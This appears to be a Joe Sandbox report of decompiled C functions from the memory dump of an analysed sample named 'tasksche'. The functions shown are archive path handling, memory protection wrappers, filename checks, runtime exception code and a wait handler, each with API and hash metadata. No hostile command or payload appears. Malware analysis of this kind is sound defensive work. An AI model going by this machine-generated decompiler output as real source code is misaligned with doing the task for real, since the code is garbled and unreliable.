                                                                                              				short _t55;
                                                                                              				short _t56;
                                                                                              				signed int _t61;
                                                                                              				intOrPtr _t63;
                                                                                              				unsigned int _t66;
                                                                                              				signed int _t67;
                                                                                              				void* _t68;
                                                                                              				signed int _t69;
                                                                                              
                                                                                              				E0041AAF0(0x2000);
                                                                                              				_t63 = _a4;
                                                                                              				_t66 = _a12;
                                                                                              				_t67 = _t66 & 0x0000ffff;
                                                                                              				_a12 = _t66 >> 0x0000001f & 0x00000001;
                                                                                              				if(_t67 == 0) {
                                                                                              					L25:
                                                                                              					_t63 = E0040A5DB(__eflags, _t63);
                                                                                              					_t68 = E0040A5DB(__eflags, _a8);
                                                                                              					_t35 = E00411E81(__eflags, L"__rar_", _t68, 6);
                                                                                              					__eflags = _t35;
                                                                                              					if(_t35 == 0) {
                                                                                              						L9:
                                                                                              						return 0;
                                                                                              					}
                                                                                              					_push(_a12);
                                                                                              					_push(_t68);
                                                                                              					__eflags = _t67 - 2;
                                                                                              					if(_t67 != 2) {
                                                                                              						L17:
                                                                                              						_push(_t63);
                                                                                              						return E00409CD1();
                                                                                              					}
                                                                                              					_push(_t63);
                                                                                              					_t38 = E00409C8B();
                                                                                              					asm("sbb eax, eax");
                                                                                              					return  ~_t38 + 1;
                                                                                              				}
                                                                                              				_t69 = E0041A7AF(_t63);
                                                                                              				if(_t67 == 2 || _t67 == 3 || E00409CAC(_t63, _a8, _t69, _a12) != 0) {
                                                                                              					L8:
                                                                                              					__eflags = _t67 - 1;
                                                                                              					if(_t67 != 1) {
                                                                                              						E0040A7AE(_t63,  &_v4100, 0x800);
                                                                                              						E0040A7AE(_a8,  &_v8196, 0x800);
                                                                                              						__eflags = _t67 - 2;
                                                                                              						if(_t67 == 2) {
                                                                                              							L12:
                                                                                              							_t48 = E00409C8B( &_v4100,  &_v8196, _a12);
                                                                                              							__eflags = _t48;
                                                                                              							if(_t48 != 0) {
                                                                                              								goto L9;
                                                                                              							}
                                                                                              							L13:
                                                                                              							__eflags = _t67 - 4;
                                                                                              							if(_t67 == 4) {
                                                                                              								L15:
                                                                                              								_t50 = E0040A0A4( &_v4100);
                                                                                              								__eflags = _t50;
                                                                                              								if(_t50 == 0) {
                                                                                              									__eflags = _t67 - 4;
                                                                                              									if(_t67 == 4) {
                                                                                              										L22:
                                                                                              										__eflags = _v4100;
                                                                                              										if(__eflags == 0) {
                                                                                              											goto L25;
                                                                                              										}
                                                                                              										_t55 = E00409CAC( &_v4100,  &_v8196, E0041A7AF( &_v4100), _a12);
                                                                                              										L24:
                                                                                              										__eflags = _t55;
                                                                                              										if(__eflags != 0) {
                                                                                              											goto L9;
                                                                                              										}
                                                                                              										goto L25;
                                                                                              									}
                                                                                              									_t56 = E0040A0A4(_t63);
                                                                                              									__eflags = _t56;
                                                                                              									if(_t56 != 0) {
                                                                                              										goto L22;
                                                                                              									}
                                                                                              									_t55 = E00409C8B( &_v4100,  &_v8196, _a12);
                                                                                              									goto L24;
                                                                                              								}
                                                                                              								_push(_a12);
                                                                                              								_push(_a8);
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							__eflags = _t67 - 5;
                                                                                              							if(__eflags != 0) {
                                                                                              								goto L25;
                                                                                              							}
                                                                                              							goto L15;
                                                                                              						}
                                                                                              						__eflags = _t67 - 3;
                                                                                              						if(_t67 != 3) {
                                                                                              							goto L13;
                                                                                              						}
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_t61 =  *(_a8 + _t69 * 2) & 0x0000ffff;
                                                                                              					if(_t61 == 0x5c || _t61 == 0x2f || _t61 == 0) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						goto L8;
                                                                                              					}
                                                                                              				}
                                                                                              			}

















                                                                                              0x00409dff
                                                                                              0x00409e05
                                                                                              0x00409e0a
                                                                                              0x00409e14
                                                                                              0x00409e1a
                                                                                              0x00409e1d
                                                                                              0x00409f41
                                                                                              0x00409f4a
                                                                                              0x00409f53
                                                                                              0x00409f5b
                                                                                              0x00409f60
                                                                                              0x00409f62
                                                                                              0x00409e68
                                                                                              0x00000000
                                                                                              0x00409e68
                                                                                              0x00409f68
                                                                                              0x00409f6b
                                                                                              0x00409f6c
                                                                                              0x00409f6f
                                                                                              0x00409ed7
                                                                                              0x00409ed7
                                                                                              0x00000000
                                                                                              0x00409ed8
                                                                                              0x00409f75
                                                                                              0x00409f76
                                                                                              0x00409f7d
                                                                                              0x00000000
                                                                                              0x00409f7f
                                                                                              0x00409e2a
                                                                                              0x00409e2f
                                                                                              0x00409e63
                                                                                              0x00409e63
                                                                                              0x00409e66
                                                                                              0x00409e7a
                                                                                              0x00409e8a
                                                                                              0x00409e8f
                                                                                              0x00409e92
                                                                                              0x00409e99
                                                                                              0x00409eaa
                                                                                              0x00409eaf
                                                                                              0x00409eb1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409eb3
                                                                                              0x00409eb3
                                                                                              0x00409eb6
                                                                                              0x00409ec1
                                                                                              0x00409ec8
                                                                                              0x00409ecd
                                                                                              0x00409ecf
                                                                                              0x00409ee4
                                                                                              0x00409ee7
                                                                                              0x00409f0b
                                                                                              0x00409f0b
                                                                                              0x00409f13
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409f34
                                                                                              0x00409f39
                                                                                              0x00409f39
                                                                                              0x00409f3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409f3b
                                                                                              0x00409eea
                                                                                              0x00409eef
                                                                                              0x00409ef1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409f04
                                                                                              0x00000000
                                                                                              0x00409f04
                                                                                              0x00409ed1
                                                                                              0x00409ed4
                                                                                              0x00000000
                                                                                              0x00409ed4
                                                                                              0x00409eb8
                                                                                              0x00409ebb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409ebb
                                                                                              0x00409e94
                                                                                              0x00409e97
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409e97
                                                                                              0x00000000
                                                                                              0x00409e47
                                                                                              0x00409e4a
                                                                                              0x00409e52
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409e52

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: __rar_
                                                                                              • API String ID: 176396367-2561138058
                                                                                              • Opcode ID: cc00e60038d7e5b00a294da67532c8ff9d8da0984a3b6968a0dc5b622ff721b3
                                                                                              • Instruction ID: 2f22db44ea277558b4e0ddbd7bf004989f9b0852302f55cc0e1d63be076b661c
                                                                                              • Opcode Fuzzy Hash: cc00e60038d7e5b00a294da67532c8ff9d8da0984a3b6968a0dc5b622ff721b3
                                                                                              • Instruction Fuzzy Hash: 2E41A176A0021966DF21AA65CC81BEF336DAF54384F08087BF905B31D3D63DCD9187A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 17%
                                                                                              			E0040CEF5(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                              				void* _t10;
                                                                                              				long _t11;
                                                                                              				intOrPtr* _t22;
                                                                                              				void* _t23;
                                                                                              				signed int _t30;
                                                                                              				void* _t32;
                                                                                              				signed int _t33;
                                                                                              				intOrPtr _t35;
                                                                                              
                                                                                              				_t35 =  *0x438808; // 0x0
                                                                                              				if(_t35 == 0) {
                                                                                              					E0040CEB6(0x438800);
                                                                                              				}
                                                                                              				_t33 = _a8;
                                                                                              				_t10 = _t33 - (_t33 & 0x0000000f);
                                                                                              				_t30 = 0 | _a16 != 0x00000000;
                                                                                              				if(_a12 == 0) {
                                                                                              					_t22 =  *0x43880c; // 0x0
                                                                                              					if(_t22 == 0) {
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t11 =  *_t22(_a4, _t10, _t30);
                                                                                              						if(_t11 == 0) {
                                                                                              							_push(L"CryptUnprotectMemory failed");
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t22 =  *0x438808; // 0x0
                                                                                              					if(_t22 == 0) {
                                                                                              						L10:
                                                                                              						_t11 = GetCurrentProcessId();
                                                                                              						_t23 = 0;
                                                                                              						if(_t33 > 0) {
                                                                                              							_t32 = _t11 + 0x4b;
                                                                                              							do {
                                                                                              								_t11 = _a4 + _t23;
                                                                                              								 *_t11 =  *_t11 ^ _t32 + _t23;
                                                                                              								_t23 = _t23 + 1;
                                                                                              							} while (_t23 < _t33);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t11 =  *_t22(_a4, _t10, _t30);
                                                                                              						if(_t11 == 0) {
                                                                                              							_push(L"CryptProtectMemory failed");
                                                                                              							L6:
                                                                                              							_push(0x4335ac);
                                                                                              							E00401000(E00406423(_t22));
                                                                                              							return E00406371(0x4335ac, 2);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t11;
                                                                                              			}











                                                                                              0x0040cefc
                                                                                              0x0040cf02
                                                                                              0x0040cf09
                                                                                              0x0040cf09
                                                                                              0x0040cf0e
                                                                                              0x0040cf1a
                                                                                              0x0040cf1f
                                                                                              0x0040cf25
                                                                                              0x0040cf60
                                                                                              0x0040cf68
                                                                                              0x00000000
                                                                                              0x0040cf6a
                                                                                              0x0040cf6f
                                                                                              0x0040cf73
                                                                                              0x0040cf75
                                                                                              0x00000000
                                                                                              0x0040cf75
                                                                                              0x0040cf73
                                                                                              0x0040cf27
                                                                                              0x0040cf27
                                                                                              0x0040cf2f
                                                                                              0x0040cf7c
                                                                                              0x0040cf7c
                                                                                              0x0040cf82
                                                                                              0x0040cf86
                                                                                              0x0040cf8a
                                                                                              0x0040cf8d
                                                                                              0x0040cf90
                                                                                              0x0040cf96
                                                                                              0x0040cf98
                                                                                              0x0040cf99
                                                                                              0x0040cf8d
                                                                                              0x0040cf31
                                                                                              0x0040cf36
                                                                                              0x0040cf3a
                                                                                              0x0040cf3c
                                                                                              0x0040cf41
                                                                                              0x0040cf46
                                                                                              0x0040cf50
                                                                                              0x00000000
                                                                                              0x0040cf59
                                                                                              0x0040cf3a
                                                                                              0x0040cf2f
                                                                                              0x0040cfa0

                                                                                              APIs
                                                                                                • Part of subcall function 0040CEB6: LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CF0E,00000020,?,?,00405D3C,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CEC4
                                                                                                • Part of subcall function 0040CEB6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CEDD
                                                                                                • Part of subcall function 0040CEB6: GetProcAddress.KERNEL32(00438800,CryptUnprotectMemory), ref: 0040CEE9
                                                                                              • GetCurrentProcessId.KERNEL32(00000020,?,?,00405D3C,?,00000020,00000001,00000000,?,00000010,?,?,?,00000001,?,?), ref: 0040CF7C
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 0040CF75
                                                                                              • CryptProtectMemory failed, xrefs: 0040CF3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentLibraryLoadProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 137661620-396321323
                                                                                              • Opcode ID: fe221cb1f1ebd7538222251a67e743d79676efd4ab4d459fbc5578979eb1af3c
                                                                                              • Instruction ID: d47b55f9d8946329b2d763cf1c5c736fe64ad30a662938a08eea1033a11e378d
                                                                                              • Opcode Fuzzy Hash: fe221cb1f1ebd7538222251a67e743d79676efd4ab4d459fbc5578979eb1af3c
                                                                                              • Instruction Fuzzy Hash: C411C171304213AFDB09AF349CD197F6756CB41B14724423FF902AA2C2DA388C41529E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A19D(signed short* _a4) {
                                                                                              				signed short _t5;
                                                                                              				signed int _t7;
                                                                                              				signed int _t10;
                                                                                              				signed int _t11;
                                                                                              				signed short* _t15;
                                                                                              				signed short* _t21;
                                                                                              
                                                                                              				_t21 = _a4;
                                                                                              				if( *_t21 == 0 || _t21[1] == 0 || E0041CA29( &(_t21[2]), 0x3a) == 0) {
                                                                                              					_t5 =  *_t21 & 0x0000ffff;
                                                                                              					_t15 = _t21;
                                                                                              					__eflags = _t5;
                                                                                              					if(_t5 == 0) {
                                                                                              						L13:
                                                                                              						__eflags = 0;
                                                                                              						return 0;
                                                                                              					}
                                                                                              					_t7 = _t5 & 0x0000ffff;
                                                                                              					while(1) {
                                                                                              						__eflags = _t7 - 0x20;
                                                                                              						if(__eflags < 0) {
                                                                                              							goto L3;
                                                                                              						}
                                                                                              						if(__eflags == 0) {
                                                                                              							L9:
                                                                                              							_t10 = E0040A0C5(_t15[1] & 0x0000ffff);
                                                                                              							__eflags = _t10;
                                                                                              							if(_t10 != 0) {
                                                                                              								goto L3;
                                                                                              							}
                                                                                              							L10:
                                                                                              							_t15 =  &(_t15[1]);
                                                                                              							_t7 =  *_t15 & 0x0000ffff;
                                                                                              							__eflags = _t7;
                                                                                              							if(_t7 != 0) {
                                                                                              								continue;
                                                                                              							}
                                                                                              							_t11 = E0041C9E6(_t21, L"?*<>|\"");
                                                                                              							__eflags = _t11;
                                                                                              							if(_t11 != 0) {
                                                                                              								goto L13;
                                                                                              							}
                                                                                              							return _t11 + 1;
                                                                                              						}
                                                                                              						__eflags = _t7 - 0x2e;
                                                                                              						if(_t7 != 0x2e) {
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					goto L3;
                                                                                              				} else {
                                                                                              					L3:
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}









                                                                                              0x0040a19e
                                                                                              0x0040a1a6
                                                                                              0x0040a1c4
                                                                                              0x0040a1c7
                                                                                              0x0040a1c9
                                                                                              0x0040a1cc
                                                                                              0x0040a20b
                                                                                              0x0040a20b
                                                                                              0x00000000
                                                                                              0x0040a20b
                                                                                              0x0040a1ce
                                                                                              0x0040a1d1
                                                                                              0x0040a1d1
                                                                                              0x0040a1d5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a1d7
                                                                                              0x0040a1df
                                                                                              0x0040a1e4
                                                                                              0x0040a1e9
                                                                                              0x0040a1eb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a1ed
                                                                                              0x0040a1ee
                                                                                              0x0040a1ef
                                                                                              0x0040a1f2
                                                                                              0x0040a1f5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a1fd
                                                                                              0x0040a204
                                                                                              0x0040a206
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a208
                                                                                              0x0040a1d9
                                                                                              0x0040a1dd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a1dd
                                                                                              0x00000000
                                                                                              0x0040a1c0
                                                                                              0x0040a1c0
                                                                                              0x00000000
                                                                                              0x0040a1c0

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr_wcspbrk
                                                                                              • String ID: ?*<>|"
                                                                                              • API String ID: 3305141221-226352099
                                                                                              • Opcode ID: 7f6a6c1d5428e83731d2b65d13748a0e82632fc7d37b167bce2bcb03fdaf0a03
                                                                                              • Instruction ID: fc4717308da4314e5704a136f2044a521342e33b833bb001f63317f55d448289
                                                                                              • Opcode Fuzzy Hash: 7f6a6c1d5428e83731d2b65d13748a0e82632fc7d37b167bce2bcb03fdaf0a03
                                                                                              • Instruction Fuzzy Hash: 1DF0F42912832254DE38A6659805AB333D49F15784F60447FE8D2BA2C2EA3D8CE3C16F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E0041DEAB(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                              				intOrPtr _t17;
                                                                                              				intOrPtr* _t28;
                                                                                              				void* _t29;
                                                                                              
                                                                                              				_t30 = __eflags;
                                                                                              				_t28 = __esi;
                                                                                              				_t27 = __edi;
                                                                                              				_t26 = __edx;
                                                                                              				_t19 = __ebx;
                                                                                              				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                              				E0041A429(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                              				 *((intOrPtr*)(E0041E9B4(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                              				_t17 = E0041E9B4(_t19, _t26, _t27, _t30);
                                                                                              				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                              				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                              					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                              					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                              						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                              							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                              							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                              								_t17 = E0041A402(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                              								_t38 = _t17;
                                                                                              								if(_t17 != 0) {
                                                                                              									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                              									_push(_t28);
                                                                                              									return E0041DC43(_t38);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t17;
                                                                                              			}






                                                                                              0x0041deab
                                                                                              0x0041deab
                                                                                              0x0041deab
                                                                                              0x0041deab
                                                                                              0x0041deab
                                                                                              0x0041deae
                                                                                              0x0041deb4
                                                                                              0x0041dec2
                                                                                              0x0041dec8
                                                                                              0x0041ded0
                                                                                              0x0041dedc
                                                                                              0x0041dee4
                                                                                              0x0041deec
                                                                                              0x0041df00
                                                                                              0x0041df02
                                                                                              0x0041df06
                                                                                              0x0041df0b
                                                                                              0x0041df11
                                                                                              0x0041df13
                                                                                              0x0041df15
                                                                                              0x0041df18
                                                                                              0x00000000
                                                                                              0x0041df1f
                                                                                              0x0041df13
                                                                                              0x0041df06
                                                                                              0x0041df00
                                                                                              0x0041deec
                                                                                              0x0041df20

                                                                                              APIs
                                                                                                • Part of subcall function 0041A429: __getptd.LIBCMT ref: 0041A42F
                                                                                                • Part of subcall function 0041A429: __getptd.LIBCMT ref: 0041A43F
                                                                                              • __getptd.LIBCMT ref: 0041DEBA
                                                                                                • Part of subcall function 0041E9B4: __getptd_noexit.LIBCMT ref: 0041E9B7
                                                                                                • Part of subcall function 0041E9B4: __amsg_exit.LIBCMT ref: 0041E9C4
                                                                                              • __getptd.LIBCMT ref: 0041DEC8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                              • String ID: csm
                                                                                              • API String ID: 803148776-1018135373
                                                                                              • Opcode ID: 2d55cb122b51988d1cc7e6481490fc99cbdc11bcbdbc1298bbf42470784b3229
                                                                                              • Instruction ID: 7c6b91792d137033b66a9eec197cc920f164d7126653d302a3e0d72df4157e21
                                                                                              • Opcode Fuzzy Hash: 2d55cb122b51988d1cc7e6481490fc99cbdc11bcbdbc1298bbf42470784b3229
                                                                                              • Instruction Fuzzy Hash: 040162B5C013148ACF389F25D444AEEB3B6AF14315F24441FE44156791DB38DED1DB49
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E00410EA0(void* __ecx, void* _a4) {
                                                                                              				long _t2;
                                                                                              				void* _t6;
                                                                                              
                                                                                              				_t6 = __ecx;
                                                                                              				_t2 = WaitForSingleObject(_a4, 0xffffffff);
                                                                                              				if(_t2 == 0xffffffff) {
                                                                                              					_push(GetLastError());
                                                                                              					E00406423(_t6, 0x4335ac, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff);
                                                                                              					return E00406371(0x4335ac, 2);
                                                                                              				}
                                                                                              				return _t2;
                                                                                              			}





                                                                                              0x00410ea0
                                                                                              0x00410ea6
                                                                                              0x00410eaf
                                                                                              0x00410eb8
                                                                                              0x00410ec6
                                                                                              0x00000000
                                                                                              0x00410ed7
                                                                                              0x00410ed8

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00410FD9,?,?,00411197,?,?,?,?,?,004111E6), ref: 00410EA6
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,004111E6), ref: 00410EB2
                                                                                                • Part of subcall function 00406423: __vswprintf_c_l.LIBCMT ref: 00406441
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410EBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: ac3bcd71a64bb110093b5bec46156cf20680403487952e12d0601c5134127ac2
                                                                                              • Instruction ID: 79dccacb4fa0009262a18c3e3c709d5502c54047c68cfd859e09497cac206ec9
                                                                                              • Opcode Fuzzy Hash: ac3bcd71a64bb110093b5bec46156cf20680403487952e12d0601c5134127ac2
                                                                                              • Instruction Fuzzy Hash: 13D0C23260402037C5013B245C05EAE36116B11331BA00722F831602F1CB6909A2429F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%